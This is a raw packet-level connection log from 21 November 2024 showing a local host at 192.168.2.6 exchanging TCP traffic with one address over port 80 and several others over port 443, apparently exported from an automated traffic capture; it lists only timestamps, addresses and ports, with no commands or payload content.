                                                                                                                                                                                                            Nov 21, 2024 15:17:38.354804993 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.355586052 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.355700016 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.355704069 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.355716944 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.355756998 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.393580914 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.393656969 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.393702030 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.393980026 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.393995047 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.394033909 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.394040108 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.396728992 CET49792443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.396748066 CET4434979213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.396886110 CET49792443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.397062063 CET49792443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.397068024 CET4434979213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.404068947 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.404140949 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.404198885 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.404355049 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.404371977 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.404395103 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.404402971 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.406562090 CET49793443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.406580925 CET4434979313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.406632900 CET49793443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.406759024 CET49793443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.406774998 CET4434979313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.536644936 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.536695004 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.536705971 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.536762953 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.537100077 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.537164927 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.537321091 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.537566900 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.537607908 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.537652969 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.538149118 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.538181067 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.538199902 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.538201094 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.538235903 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.539011002 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.539096117 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.539139986 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.539556980 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.539628983 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.539638996 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.539679050 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.540396929 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.540447950 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.540458918 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.540467024 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.540498972 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.544040918 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.544054031 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.544066906 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.544078112 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.544090986 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.544092894 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.544099092 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.544135094 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.544168949 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.544179916 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.544192076 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.544220924 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.544508934 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.544548988 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.544652939 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.544665098 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.544806957 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.545274973 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.545286894 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.545301914 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.545347929 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.546143055 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.546195984 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.546314001 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.546324968 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.546377897 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.547079086 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.547225952 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.547240973 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.547271967 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.547775030 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.547831059 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.547957897 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.547971010 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.548011065 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.548747063 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.548758984 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.548778057 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.548810005 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.549540043 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.549552917 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.549566984 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.549576998 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.549604893 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.550198078 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.550209999 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.550225973 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.550252914 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.550785065 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.550848961 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.550851107 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.550863028 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.550900936 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.551641941 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.551665068 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.551676989 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.551727057 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.552499056 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.552552938 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.552561045 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.552563906 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.552601099 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.553389072 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.553427935 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.553438902 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.553476095 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.554362059 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.554416895 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.554431915 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.554462910 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.554497004 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.555114031 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.555155039 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.555166960 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.555202961 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.556000948 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.556011915 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.556025028 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.556052923 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.556086063 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.556827068 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.556848049 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.556859970 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.556907892 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.557730913 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.557781935 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.557796955 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.560350895 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.560436010 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.560503960 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.561583996 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.561614037 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.561633110 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.561641932 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.566406965 CET49794443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.566440105 CET4434979413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.566544056 CET49794443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.566694975 CET49794443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.566709995 CET4434979413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.608922005 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.168126106 CET4434978940.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.168234110 CET49789443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.197002888 CET49789443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.197031975 CET4434978940.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.197401047 CET4434978940.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.249521017 CET49789443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.354741096 CET49789443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.357584953 CET49789443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.357634068 CET4434978940.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.357806921 CET49789443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.403325081 CET4434978940.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.748049974 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.762944937 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.762991905 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.763480902 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.763489962 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.802763939 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.804702044 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.804748058 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.805115938 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.805124044 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.879604101 CET4434978940.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.879867077 CET4434978940.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.879940987 CET49789443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.880603075 CET49789443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.880651951 CET4434978940.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:39.880682945 CET49789443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.208302021 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.208386898 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.208538055 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.210350990 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.210374117 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.210390091 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.210397005 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.214411974 CET49795443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.214441061 CET4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.214523077 CET49795443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.214807987 CET49795443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.214817047 CET4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.215725899 CET4434979313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.215754032 CET4434979213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.216269970 CET49793443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.216289043 CET4434979313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.216685057 CET49792443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.216716051 CET4434979213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.216943026 CET49793443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.216948032 CET4434979313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.217108011 CET49792443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.217113018 CET4434979213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.245426893 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.245599031 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.245661020 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.247859001 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.247878075 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.247889042 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.247895002 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.254165888 CET49796443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.254245996 CET4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.254416943 CET49796443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.254698038 CET49796443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.254736900 CET4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.376357079 CET4434979413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.377289057 CET49794443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.377311945 CET4434979413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.377738953 CET49794443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.377743959 CET4434979413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.662693977 CET4434979313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.662763119 CET4434979313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.662859917 CET49793443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.663068056 CET49793443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.663079023 CET4434979313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.663091898 CET49793443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.663096905 CET4434979313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.665273905 CET4434979213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.665366888 CET4434979213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.665442944 CET49792443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.665704012 CET49792443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.665730953 CET4434979213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.665759087 CET49792443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.665767908 CET4434979213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.665895939 CET49797443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.665935993 CET4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.666107893 CET49797443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.670109034 CET49797443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.670136929 CET4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.671439886 CET49798443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.671482086 CET4434979813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.671536922 CET49798443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.671688080 CET49798443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.671708107 CET4434979813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.838294029 CET4434979413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.838373899 CET4434979413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.838438034 CET49794443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.838566065 CET49794443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.838589907 CET4434979413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.838604927 CET49794443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.838613987 CET4434979413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.842928886 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.842972040 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.843328953 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.843842983 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:40.843856096 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:41.585570097 CET49802443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:41.585616112 CET4434980220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:41.585809946 CET49802443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:41.586096048 CET49803443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:41.586148024 CET44349803150.171.27.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:41.586263895 CET49803443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:41.589334965 CET49802443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:41.589355946 CET4434980220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:41.589416027 CET49803443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:41.589432955 CET44349803150.171.27.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:41.972481012 CET4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.012556076 CET49796443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.012590885 CET4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.013062954 CET49796443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.013077021 CET4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.062997103 CET4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.063452959 CET49795443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.063472986 CET4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.063922882 CET49795443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.063930988 CET4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.408178091 CET4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.408246994 CET4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.408318996 CET49796443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.408524990 CET49796443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:42.408576012 CET4434979613.107.246.45192.168.2.6
